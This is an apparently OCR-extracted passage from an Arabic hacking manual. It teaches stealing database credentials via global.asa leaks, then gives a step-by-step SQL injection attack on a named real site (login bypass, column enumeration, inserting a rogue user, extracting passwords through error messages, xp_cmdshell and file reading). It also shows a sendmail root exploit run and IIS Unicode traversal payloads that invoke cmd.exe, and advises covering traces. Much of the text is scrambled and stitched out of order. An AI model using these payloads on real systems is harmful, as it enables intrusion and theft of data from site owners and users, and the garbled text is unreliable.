‪.asp+.+‬‬ ‫كيف تستخدم هذه الثغرة ‪:‬‬ ‫‪http://target/page.

asa‬‬ ‫‪global. "6666666‬‬ ‫‪<%‬‬ ‫‪----------------------------------------------------------------‬‬‫في الكود السابق ترى ان اسم المستخدم هو _‪LinuxRay‬‬ ‫وكلمة السر هي ‪6666666‬‬ ‫‪-----------------------------------------------------------------‬‬ ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ ASP‬مثل التي ‪:‬‬ ‫‪'AMicrosoft VBScript runtime error '800a01a8‬‬ ‫‪'Object required: 'Conn‬‬ ‫‪filename.CreateObject("ADODB.WSID=xxx.‬‬ ‫وممكن ان ترى مثل هذا المر في صفحة ‪ASP‬‬ ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪database.SERVER=xxx.‫>‪%‬‬ ‫‪("Set DB= Server. line 5/‬‬ ‫هناك ملف ينتهي بامتداد *‪ inc.UID=sa.asa‬‬ ‫‪global. "_LinuxRay".‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬ ‫المستخدم وكلمة المرور‬ ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع ‪.asa+.DATABASE=moe_dbs".asa‬‬ ‫ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪SQL‬‬ ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي ‪:‬‬ ‫‪global.inc‬‬ ‫>!‪<--"include file = "database.htr‬‬ ‫‪223‬‬ .asa++‬‬ ‫‪beforemilion-global.Connection‬‬ ‫‪DB.sql‬‬ ‫‪global-direct.APP=Microsoft (R) Developer‬‬ ‫‪"Studio.inc.asa‬‬‫‪milion.PWD=.Open "DRIVER=SQL‬‬ ‫‪Server.inc#--‬‬ ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬ ‫‪global.

1‬ادخل اسم الموقع في صندوق ‪Select or enter server name‬‬ ‫‪ ..‫هناك ثغرة قديمة في ‪ IIS 3‬وهي ان تضيف بعد صفحة ‪ ASP‬هذا الرمز ‪ data$::‬كما يلي‬ ‫‪file.‬‬ ‫لقد اقتربنا من النهاية ‪ .‬‬ ‫يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة ‪:‬‬ ‫‪Select the data base on the server‬‬ ‫واضغط على ‪ OK‬او موافق ‪.‬‬ ‫سيظهر لك مربع لنشاء الملف اختر‬ ‫‪Create‬‬ ‫اي انشاء‬ ‫الن سترى مربع‬ ‫‪Data Link Properties‬‬ ‫تحتاج فقط لثلث معلومات اسم الموقع او الي بي ‪ -‬اسم المستخدم ‪ -‬كلمة المرور‬ ‫‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" درس مفصل عن الـ ‪" SQL‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫‪224‬‬ .3‬كلمة السر ‪Password‬‬ ‫ملحظة ) قم بإزالة الصح من مربع ‪(Blank Password‬‬ ‫اضغط في البداية على ‪ Test Connection‬في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه‬ ‫العبارة ‪Test Connection Succeeded‬‬ ‫فمعناه ان التصال بقاعدة البيانات تم بنجاح‪.‬ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬ ‫بعدها الدخول على قاعدة ال ‪!! SQL‬‬ ‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ Visual interdev 6.asp::$data‬‬ ‫هذه الثغرة لتعمل ال على ‪ IIS 3‬فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر ‪.0‬لكني مازلت افضل‬ ‫استخدام البرنامج السهل ‪ACCESS 2000‬‬ ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬ ‫‪File‬‬ ‫اختر‬ ‫‪New‬‬ ‫ومن قائمة الملفات الجديدة اختار‬ ‫‪(Project (Exiting Data‬‬ ‫اي مشروع قاعدة بيانات موجودة ‪.2‬اسم المستخدم في ‪User Name‬‬ ‫‪ ..

‬‬ ‫‪SQL Server .asp?pagenum=25‬‬ ‫عند دخوله فأنه يطلب منك أسم مستخدم وكلمة مرور !!!!‬ ‫دائما في الحاله هذه أول ما يتبادر لنا هو الـ ‪SQL injection‬‬ ‫نقوم بتجربة‬ ‫أسم مستخدم ‪' :‬‬ ‫وكلمة مرور ‪' :‬‬ ‫فنحصل على الخطأ التالي‬ ‫اقتباس‪:‬‬ ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬ ‫‪''80040e14‬‬ ‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬ ‫‪. MySQL.asp. line 33/‬‬ ‫وفي بعض الحالت يظهر الخطا التالي‬ ‫‪225‬‬ .Oracle‬‬ ‫يتم أستخلص المعلومات المطلوبه وترك البقيه‬ ‫حيث تأخذ معلومات من المستخدم ومن ثم تعالج ويستخدم بعضها في تكون‬ ‫أوامر الـ ‪ SQL‬ليتم أستخلص البيانات أو التأكد من صحة بعض المدخلت لبناء‬ ‫الصفحة المطلوبه أو قبول المستخدم أو رفضه‬ ‫دائما يتم طلب أسم مستخدم وكلمة مرور في الصفحات التي تخولك بعمل عمل ل‬ ‫يقوم به إل من قام صاحب الموقع بإعطائه الصلحيه للقيام بها‬ ‫كأن يقوم بحذف موضوعي ‪ (:‬أو تثبيته في القائمه ‪((((:‬‬ ‫حيث يتم التأكد من وجود أسم المستخدم في قاعدة البيانات وأن كلمة المرور المعطاه مطابقه لتلك الموجوده‬ ‫بجانب أسم المستخدم‬ ‫حيث يتم أخذ معلومه وتضمينها في أمر الـ ‪ SQL‬الذي يقوم بالتأكد من وجودها وصلحيتها‬ ‫ولكن يجب الحذر عند كتابة سكربت يقوم بتوثيق المستخدم للتأكد من أنه مخول له بالدخول للصفحه المحميه‬ ‫أم ل‬ ‫وذلك بالتأكد من نظافة القيم المستقبله من المستخدم وخلوها من أي رموز من شأنها أن تجعل أمر الـ ‪SQL‬‬ ‫خاطئ‬ ‫في بنائه أو القيام بأي أمر غير مسموح به‬ ‫سنتكلم الن عن ما يسمى ‪SQL injection‬‬ ‫حيث أنه ضعف في كتابة سكربت التوثيق وأيضا بوجود موقع للتجربه‬ ‫وهو موقع شركة التصالت السعوديه‬ ‫عنوان الموقع ‪/http://www.sa/arabic/scripts/ar_frame.‬‬ ‫وعن طريق سكربت مكتوب بإحدى لغات الويب الديناميكيه ‪ PHP‬أو ‪ASP‬‬ ‫والتي تعمل جمبا إلى جمب مع محركات قواعد البيانات ‪.com.sa‬‬ ‫عند الدخول للصفحة الرئيسيه نجد رابط يختص بمقدمي خدمة أنترنت في السعوديه‬ ‫وهو ‪http://www.‫>ةةةةةة‪< hish_hish :‬‬ ‫أتجهت غالبية المواقع لستخدام صفحات ديناميكيه ومنها ما نحن موجودين فيه ‪(:‬‬ ‫وتستخدم قواعد بيانات فيها كم كبير من المعلومات ‪.' '' quotation mark before the character string‬‬ ‫‪arabic/Scripts/ar_csd_reply.stc.stc.com.

asp.''=before the character string ''' AND Password‬‬ ‫‪admin/admin.‬‬ ‫غير ذلك سيتم إرجاع ‪ FALSE‬وسيتم رفض الدخول‬ ‫ملحظه ‪ :‬يجب أن يكون لديك ولو القليل من المعرفه بأوامر الـ ‪.‫اقتباس‪:‬‬ ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬ ‫‪''80040e14‬‬ ‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬ ‫‪quotation mark‬‬ ‫‪.‬‬ ‫إذن لنتكلم عن الـ ‪ SQL injection‬بشيء من التفصيل‬ ‫لو كان لدينا سكربت يقوم بالتأكد من صلحية اسم المستخدم وكلمة المرور المدخله من المستخدم قأننا‬ ‫سنتحقق منها بالطريقة التاليه‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE User_Name='<field from web‬‬ ‫‪'<form>' AND Password='<field from web form‬‬ ‫‪}( if( TRUE‬‬ ‫‪Login OK‬‬ ‫{‬ ‫‪} else‬‬ ‫‪Login FAILD‬‬ ‫{‬ ‫عند قيام أحد المسموح لهم بالدخول للصفحة المحميه فأنه يقوم بكل تأكيد بتوثيق نفسه قبل أن يسمح له‬ ‫بالدخول‬ ‫فعند قيامه بأدخال أسم المستخدم وكلمة المرور الخاصه به‬ ‫أسم المستخدم ‪admin :‬‬ ‫كلمة المرور ‪t0ps3cr3t :‬‬ ‫فإن شكل امر الـ ‪ SQL‬سيصبح بالشكل التالي ‪:‬‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE Users_Name='admin' AND‬‬ ‫‪'Password='t0ps3cr3t‬‬ ‫وعند وجود سطر في جدول ‪ User‬تحقق فيه الشرط وهو أن يكون اسم المستخدم ‪ admin‬وكلمة المرور‬ ‫‪t0ps3cr3t‬‬ ‫فأن المر سيقوم بإرجاع قيمة ‪ TRUE‬أي أن المستخدم مخول بالدخول ‪. line 13/‬‬ ‫وفي الخطأ هذا حصلنا على جزء من أمر الـ ‪ SQL‬وأيضا أسم أحد العمده في الجدول‬ ‫وهو ما يؤكد أمكانية عمل ‪ inject‬للـ ‪ SQL Query‬المستخدمه للتحقق صلحية أسم المستخدم وكلمة‬ ‫المرور المدخله ‪. SQL‬‬ ‫>‪ <field from web form‬يحل محلها ما أدخله المستخدم في صفحة التحقق من صلحيته‬ ‫في تجربتنا عندما قمنا بإدخال ' كإسم مستخدم وبالمثل لكلمة المرور فأن أمر الـ ‪ SQL‬أصبح بالشكل‬ ‫التالي ‪:‬‬ ‫‪:code‬‬ ‫‪226‬‬ .

‬حيث يمكننا الستعاضه عن ما أدخلناه قبل قليل‬ ‫بالمدخلت التاليه‬ ‫أسم مستخدم ‪--'blah' OR '1'='1 :‬‬ ‫وكذلك كلمة المرور ) في بعض الحالت يمكنك إهمال كتابة كلمة مرور لن ‪ --‬ستهملها لنها تأتي بعد اسم‬ ‫المستخدم في أمر الـ ‪SQL‬‬ ‫توجد طريقه مريحه جدا ومضمونه بحيث أنك لن تحتاج لتخمين أحد أسماء العمده‬ ‫وهي أستخدام ‪having clause‬‬ ‫بالطريقه التاليه‬ ‫أسم مستخدم ‪'having 1=1--‬‬ ‫حيث سنحصل على رسالة خطأ كالتاليه‬ ‫‪'Microsoft OLE DB Provider for ODBC Drivers error '80040e14‬‬ ‫‪227‬‬ .....‬‬ ‫فيصبح شكل أمر الـ ‪SQL‬‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND‬‬ ‫‪'Password='blah' OR '1'='1‬‬ ‫لنحلل المر كل جزء على حدا‬ ‫‪SELECT * from Users‬‬ ‫تعني أختر جميع السطور من الجدول ‪Users‬‬ ‫‪'WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1‬‬ ‫في هذا الجزء نقوم بتحديد السطر الذي سنقوم بإختياره وهو الذي تتحقق فيه الشروط‬ ‫'‪'blah' OR '1'='1‬‬ ‫هنا بوجود ‪ OR‬لم تصبح قيمة نصيه ولكن أصبحت شرط‬ ‫يصبح الشرط صحيح إذا كان طرف واحد على القل من الطراف المشتركه في الشرط صحيح‬ ‫وفي حالتنا فإن الطرف الول هو '‪'blah‬‬ ‫وهو بدون الخوض في تفاصيل لسنا في صددها الن يعبر عن قيمة صحيحه ‪TRUE‬‬ ‫والطرف الخر هو '‪'1'='1‬‬ ‫يمكنك الجابة عن إذا كانت ‪ 1‬مساويه لـ ‪ 1‬أم ل !!!!‬ ‫إذا سيكون شكل الشرط بعد تحليله هو ‪TRUE OR TRUE‬‬ ‫وبالتالي فإن النتيجه النهائيه للشرط هي ‪TRUE‬‬ ‫ونفس التفاصيل تحدث لكلمة المرور‬ ‫ملحظه مهمه جدُا‪ :‬القيمه ‪ TRUE‬التي نحصلها من الشرط ليست مساويه للكلمه ‪ TRUE‬التي نكتبها على‬ ‫لوحة المفاتيح الخاصه بنا‬ ‫لذلك ل تحاول إستخدام أسم مستخدم ‪ TRUE‬وكلمة مرور ‪ TRUE‬لتمام الـ ‪SQL injection‬‬ ‫الشرط السابق سيقوم بأختيار أول سطر من الجدول ‪ Users‬ويرجع محتوياته في مصفوفه‬ ‫وبالتالي في بعض الحالت ستجد أنك قد أستطعت الدخول للصفحة المحميه‬ ‫ولكن في حالت أخرى ل‬ ‫لنكمل التفاصيل ‪.‫‪'=SELECT * from Users WHERE User_Name=' ' ' AND Password‬‬ ‫' '‬ ‫ونلحظ أننا قمنا بإغلق علمة التنصيص الولى وبقي علمة تنصيص لم تغلق بعد‬ ‫وهو ما أدى لظهور رسالة الخطأ !!‬ ‫الن نقوم بتجربة ٍام مستخدم ‪blah' OR '1'='1 :‬‬ ‫ومثلها لكلمة المرور‪.‬‬ ‫يجب التنبه لنه ربما يكون الشرط في أمر الـ ‪ SQL‬وهو ما يأتي بعد ‪ WHERE‬يتحقق من عدة أشياء‬ ‫لذلك نستخدم ‪ (two dashes) --‬ليتم إهمال بقية السطر ‪ .

Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.UserID' is invalid in the select list because it is not
.contained in an aggregate function and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp, line 33/
‫وبها أسم الجدول وأيضا أسم أول عمود‬
‫بعدها لنستطيع الحصول على اسماء بقية العمده‬
group by ‫سنستخدم‬
‫بالشكل التالي‬
'group by cs_isp_user.UserID-passwd ‫بعدها سنحصل على عمود أسمه‬
‫فنستخدمه للحصول على اسم العمود اللي يليه بالشكل التالي‬
'group by cs_isp_user.UserID,cs_isp_user.passwd-! ‫ونكرر زيادة أسم كل جدول مع العمود إلى أن نحصل على صفحة تخبرنا بأن أسم المستخدم خاطئ‬
‫نحتاج الن أن نقوم بجمع أكبر قدر ممكن من أسماء العمده في هذا الجدول‬
: ‫نقوم بإدخال التالي‬
--(blah' group by (username : ‫أسم مستخدم‬
: ‫فنحصل على الخطأ التالي‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Invalid]
.'column name 'username
arabic/Scripts/ar_csd_reply.asp, line 33/

username ‫وهو ما يفيد بأنه ل يوجد عمود في هذا الجدول له السم‬
password ,username,id,userid,email ‫نقوم بتجربه السماء الشائعه مثل‬
first_name,
‫ فأننا نحصل على خطأ أخر وهو ما نبحث عنه‬userid ‫عند تجربتنا لـ‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.passwd' is invalid in the select list because it
is not contained in either an aggregate function or the
.GROUP BY clause
arabic/Scripts/ar_csd_reply.asp, line 33/

228

‫هنا حصلنا على معلومتين وهي أسم الجدول وهو ‪cs_isp_user‬‬
‫وأيضا أسم أحد العمده وهو ‪passwd‬‬
‫نقوم الن بتكرار العمل السابق ولكن بإستخدام اسم العمود الجديد‬
‫فنقوم بإدخال أسم المستخدم التالي ‪--(blah' group by (passwd :‬‬
‫فنحصل على الخطأ التالي ‪:‬‬
‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e14‬‬
‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
‫‪'cs_isp_user.UserID' is invalid in the select list because it is‬‬
‫‪not contained in either an aggregate function or the GROUP‬‬
‫‪.BY clause‬‬
‫‪arabic/Scripts/ar_csd_reply.asp, line 33/‬‬

‫حصلنا على أسم عمود وهو ‪ UserID‬وهو نفسه ما قمنا بتخمينه وهو ‪userid‬‬
‫تجدر الشاره إلى أن ‪ MS SQL Server‬ليس حساس لحالة الحرف ‪(:‬‬
‫نلحظ أننا سنكون في حلقه غير منتهيه ول نحصل إل على أسماء الجداول ‪ UserID‬و ‪passwd‬‬
‫إذن الجدول ل يحوي إل على عمودين وهي التي حصلنا عليها‬
‫إذن في الحاله هذه نقوم بأدخال مستخدم جديد للجدول وبعدها نقوم بالدخول بشكل طبيعي من الصفحه‬
‫الخاصه بتسجيل الدخول ‪(:‬‬
‫سنقوم بكتابة التالي في خانة أسم المستخدم ‪blah' INSERT INTO :‬‬
‫‪cs_isp_user(UserID,passwd‬‬
‫( ‪--('VALUES('M_3','hi‬‬
‫حيث سيتم إضافة مستخدم جديد له أسم مستخدم ‪ M_3‬وكلمة مرور ‪hi‬‬
‫وبعدها تستطيع الدخول للصفحة المحميه بهذه البيانات على أنك مخول له بالدخول‬
‫في مثالنا )شركة التصالت( أنتهينا من استغلل أمكانية عمل ‪ inject‬لها ولكننا سنكمل الحديث عن طريقه‬
‫ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تستطيع الدخول بأي منها دون إضافة‬
‫نفسك‬
‫وهو المر الذي لن يضع شكوك حول وجود لشخص مشبوه‬
‫سنكمل ما بدأناه ولكن بإضافة عمود أخر له السم ‪ id‬وهو رقم تسلسلي لكل مستخدم ) تذكر أنه رقم(‬
‫إذن لدينا جدول أسمه ‪user‬‬
‫يحوي العمده التاليه‬
‫‪ id‬وهو رقم صحيح‬
‫‪ username‬وهو قيمة نصيه ) القيم النصيه يمكن أن تحوي أرقام( مثال ‪admin1‬‬
‫‪ passwd‬وهي أيضا قيمه نصيه‬
‫نجرب عمل ‪ union‬لقيمه نصيه وتحويلها إلى قيمة عدديه ) لن يتم التحويل ولكنه سيخرج رساله خطأ‬
‫ثمينه جدا(‬
‫ندخل اسم المستخدم ‪blah' union SELECT username FROM user :‬‬
‫و سنحصل على رسالة خطأ ل تفيدنا في شيء‬
‫رسالة الخطأ هي‬
‫اقتباس‪:‬‬

‫‪229‬‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]All]
queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
.lists
admin/admin.asp, line 13/

‫ مره واحد فتصبح بالشكل التالي‬id ‫نقوم بزيادة‬
blah' union SELECT username,username FROM user
‫فنحصل على نفس رسالة الخطأ‬
‫نتابع الزياده إلى أن نحصل على رسالة خطأ مختلفه‬
‫لنفترض أننا حصلنا على رسالة الخطأ الجديده عند أدخال اسم المستخدم التالي‬
blah' union SELECT username,username,usernam
e,username,username FROM user
‫فنحصل على رسالة الخطأ التاليه‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e07
Microsoft][ODBC SQL Server Driver][SQL Server]Syntax]
error converting the
.varchar value 'Lame_Admin' to a column of data type int
admin/admin.asp, line 13/

‫( حصلنا على أول أسم مستخدم وهو عادًة ما يكون للدمن‬:
‫ أن يقوم بتحويل قيمة نصيه )وهي‬SQL ‫وسبب ظهور هذا الخطأ هو لننا نطلب من محرك‬
(int )‫( إلى قيمة عدديه صحيحه‬Lame_Admin
‫ إلى قيمة عدديه‬Lame_Admin ‫ لذلك يقوم بأخبارك أنه ل يستطيع تحويل‬, ‫وهو الشيء الغير مسموح‬
(: ‫ بعمله‬microsoft ‫( هذا أذكى شي قامت‬: ‫صحيحه‬
‫الن حصلنا على أسم المستخدم وسنحاول الحصول على كلمة المرور‬
blah' union SELECT passwd,passwd,passwd,pass: ‫ندخل أسم المستخدم التالي‬
wd,passwd FROM user
‫بنفس العدد السابق عند حصولنا على أسم المستخدم‬
‫سنحصل على هذا الخطأ‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error

230

‫‪''80040e07‬‬
‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬
‫‪.varchar value 'stupid' to a column of data type int‬‬
‫‪admin/admin.asp, line 13/‬‬

‫حصلنا على أسم المستخدم وكلمة المرور ويمكننا تسجيل الدخول للصفحة المحميه بدون وجود أي أثر لنا‬
‫إل إذا كانت الصفحه المحميه عند الدخول لها تقوم بطباعة بعض المعلومات مثل رقم اليبي لخر شخض قام‬
‫بالدخول بإسم المستخدم هذا‬
‫عندها فكر بما ستقوم به بنفسك‬
‫بقي أتكلم عن الـ ‪Stored Procedure‬‬
‫وهي كتشبيه أقرب إلى أدوات موجوده مسبقا ‪ Built-in‬تقوم بعمل محدد عند طلبها‬
‫ستستطيع الستفاده من الـ ‪ Stored Procedure‬إذا كان الـ ‪ SQL Server‬يعمل على المستخدم ‪sa‬‬
‫أو إذا كان المستخدم الذي يعمل عليه الـ ‪ SQL Server‬تم السماح له بٍاستخدامها‬
‫لذلك فأنت محظوظ عند حصولك على ‪ SQL Server‬بهذه المكانيات‬
‫يوجد أكثر من ‪Stored Procedure 100‬‬
‫في الجدول التالي أهمها‬
‫‪---------------------------+‬‬
‫‪+------------------------------------------------------------------------------+‬‬
‫| ‪ |----------xp_cmdshell‬تمرير أمر لنظام التشغيل ) يتم تنفيذه على حسب صلحيات‬
‫المستخدم(‪|-------‬‬
‫| ‪ |-----------xp_regread‬قراءة قيمة مفتاح في‬
‫الريجستري‪|--------------------------------------------‬‬
‫| ‪ |----xp_regdeletekey‬حذف مفتاح من‬
‫الريجستري‪|-------------------------------------------------‬‬
‫| ‪ |-xp_regdeletevalue‬حذف قيمة مفتاح من‬
‫الريجستري‪|--------------------------------------------‬‬
‫| ‪ |---------- xp_regwrite‬للكتابة في‬
‫الريجستري‪|-------------------------------------------------------‬‬
‫| ‪ |--xp_servicecontrol‬لبدأ أو أنهاء خدمة على‬
‫السيرفر‪|--------------------------------------------‬‬
‫‪----------------------------+‬‬
‫‪+-----------------------------------------------------------------------------+‬‬

‫أما طريقة الستفاده من أي من هذه الـ ‪ Procedure‬فهي بالشكل التالي‬
‫'‪exec master..xp_cmdshell 'dir‬‬
‫هذا مثال لطريقة أستخدام ‪ xp_cmdshell‬والبقيه مثله‬
‫عدا الكتابة في الريجستري فهو بالشكل التالي‬
‫'‪exec master..xp_regwrite 'REGISTERY KEY' VALUE‬‬
‫‪231‬‬

‫أيضا بقي الشاره إلى أنه بأمكانك قراءة كود ملفات ‪ asp‬التي يعمل عليها الموقع عن طريق إضافة جدول‬
‫جديد ومن ثم نسخ كود صفحة ‪ asp‬ووضعه‬
‫في هذا الجدول بالطريقة التاليه‬
‫))‪CREAT TABLE M_3 ( source varchar(8000‬‬
‫هذا السطر يقوم ببناء الجدول وأسم الجدول ‪ M_3‬وبداخله عمود واحد من النوع ‪ varchar‬حجمه ‪8000‬‬
‫بايت‬
‫بعد ذلك بأمكانك الن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي‬
‫'‪bulk insert M_3 from 'c:\InetPub\wwwroot\login‬‬
‫‪asp.‬‬
‫ولقرائة ما تم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تكلمنا عنها في الموضوع السابق‬
‫أسهلها هو عمل ‪ union‬حيث يتم توليد رسالة خطأ بها ما تم نسخه‪.‬‬

‫انتهى‪،،،‬‬

‫" درس لحتراف الهاك في اختراق المواقع "‬
‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬
‫>ةةةةةة‪< CONIK :‬‬
‫أن شاء ال في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الختراق‬
‫في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن قلنا‬
‫في الدرس الول الى كان عن اختراق الجهزة أنه الى بى هو الباب والبورت هو المفتاح له‬
‫بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا‬
‫بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى ‪-:‬‬
‫س ‪ -:1‬طيب ممكن تقول لى أيش هي الثغرات يعنى تعريف لها ؟؟‬
‫جـ‪ -:‬الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة‬

‫‪232‬‬

‫التى تخليك تتحول من ‪ user‬الى ‪ administrator‬يعنى من مستخدم الى المدير المتصرف وتتضمن‬
‫ويجب‬
‫على الدوام معرفة الثغرات المنيه الجديدة وأستثمارها علشان ل يتنبه أصحاب المواقع بيها‬
‫يرقعوها ) يتم تقفليها (‬
‫وأقرب مثال لهذه الثغرات الضعف المني الذى أكتشف في الباتشى وهو سيرفر يركب على نظام ليونكس‬
‫وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والستفاده‬
‫منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها‬
‫س ‪ -:2‬طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟‬
‫جـ‪ -:‬من وقت ما أكتشفوا الثغرات كانت نسبة ‪ %99‬من الثغرات تكون سكربتاتها مكتوبه بالغه ‪ C‬وانته‬
‫تحتاج لمعرفة هذه اللغه أو‬
‫عليك تحويلها ‪.‬‬
‫كما أن هناك العديد من الثغرات يحتاج الى ‪ shell‬حتى انته تتمكن من الستفاده من هذه الثغره أو بمعنى‬
‫أخر الضعف‬
‫وعلى سبيل المثال بعض الثغرات الموجوده فى ‪ PHP‬تحتاج الى ‪ Shell PHP‬ومن هذه الكلم‪.‬‬
‫وعلى فكرة الضعف يكون في الصدارات الخاصة‬
‫وكمان في ثغره من نوع ‪ Kernel 2.2.x‬ولكن هذه المرة في نظام تشغيل ليونكس‬
‫) ملحظه هذه الثغرات التى تكون باللغة ‪ C‬تكون سيكربتات توجوده فى الموقع ( وهناك أيضا سيكربتات‬
‫أخرى مكتوبة باللغه ‪perl‬‬
‫ولزم فى هذه الحالة تكون انته مركب لوينكس علشان الوامر وأنا أنصحك تركب ‪linux Redhat 7.3‬‬
‫لنه أفضل من الماندريك وأذكر انه الخ بلك هانتر لمن انا سألته أركب الماندريك ول الريد هات قال لى انه‬
‫الماندريك صورة مبسطه‬

‫‪233‬‬

‫للريد هات بس غير قابله للتطور وأنه الريدهات أقوى وجزاة ال خير على هذه النصيحة نرجع للموضوع‬
‫س ‪ -:3‬كيف أحول لغه البيرل ؟؟‬
‫جـ‪ -:‬الطريقة مره سهله كلها اوامر عادية في البداية انته سوى هذه المر‬
‫‪file.pl/.‬‬
‫تعطيك هذه الرسالة‬
‫‪ ----Access Denied‬هذه الرسالة توضح عدم الموافقه‬
‫أذا صار لك كذا كا عليك سوى كتا بته المر هذه‬
‫‪ -----chmod +x Conik.pl‬لحظ مكان كونيك انته تكتب أسم الملف‬
‫وشغلة مره ثانية وشوف النتجيه راح تكون زى كذا‬
‫‪Conik.pl/. $‬‬
‫س ‪ -:4‬طيب بالنسبة للغة ‪C‬‬
‫جـ‪ -:‬علشان تحويل الملف لزم انته تخلى الملف يكون ملف تنفيذى بهذه المر‬
‫‪ <------ gcc -o Conik Conik.c‬لحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة‬
‫يعنى على سبيل المثال ‪-:‬‬
‫‪gcc -o Conik conik.c‬‬
‫وراح يكون الملف جاهز بعد هذه المر‬
‫‪Conik.c/.‬‬
‫وبعد ماصار الملف جاهز‬
‫‪gcc -o sendmail sendmail.c $‬‬
‫‪sendemail/. $‬‬
‫‪<Usage : sendmail <host> <OS> <user> <password‬‬
‫‪<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous /. $‬‬

‫‪234‬‬

‫لحظ انك انته تكتب هنا الموقع الى تبغاه مكان ‪israel‬‬
‫‪...connecting to host‬‬
‫‪...connected‬‬
‫‪id‬‬
‫‪(uid=0(root) gid=0(root‬‬
‫لحظ انه طلب ممنا الملقم للبرنامج ‪ Sendemail‬وكمان طلب نظام التشغيل واليوزر والباسورد‬
‫وبعد هذه كله البرنامج أعطانا أمتياز ‪ Root‬بسبب قيام البرنامج بتنفيذ الـ ‪Exan nofer‬‬
‫ملحظة ل تضن أنه لمن انا حطيت البرنامج ‪ XXX. SENDMAIL‬بدون اى سبب أنا حطيت لك هذه المثال‬
‫لنه هناك ثغره فى هذه البرنامج‬
‫وراح أشرحها لك أن شاء ال تعالى بس كان بدى تحفظ السم هذه ‪(-:‬‬
‫الظاهر انه نحنا أتوغلنا فى الموضوع زايدة عن اللزوم‬
‫س ‪ -:5‬يا ال كل هذه علشان ثغره بس بطلت أنا ما أبغا اتعلم‬
‫جـ‪ -:‬لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا‬
‫س ‪ -:6‬أيش هي قو ل يا ‪ Conik‬ترى هذه الطريقة يبغالها نظام تشغيل وكمان لغه ‪ C‬و ‪Perl‬‬
‫في تغرات تستخدم من خلل المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف‬
‫الباسوردات من هذه الطريقه‬
‫ومثال على هذه الثغرات ‪PHP - CGI - UNICODE - VB - etc‬‬
‫س ‪ -:7‬اوووووة ‪ UNICODE‬أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟‬
‫جـ‪ -:‬حبيبى ‪ UNICODE‬هى عبارة عن ضعف في نظام ‪ IIS‬في ‪ Microsoft‬مما تساعد في أختراق‬
‫الموقع بكل سهوله عموما الختراق بهذه الطرق سهل جدا‬
‫مقارنة بالطرق السابقة التى تم ذكرها من قبل وسوف أضع أمثله على ثغرات ‪-: UONICODE‬‬
‫‪vti_bin/.._/‬‬
‫‪%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi‬‬
‫‪\:nnt/system32/cmd.exe?/c+dir+c‬‬
‫‪Rpc/../‬‬
‫‪%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir‬‬
‫‪\:+c‬‬
‫‪samples/..%255c..%255c..%255c..%255c..%255c../‬‬
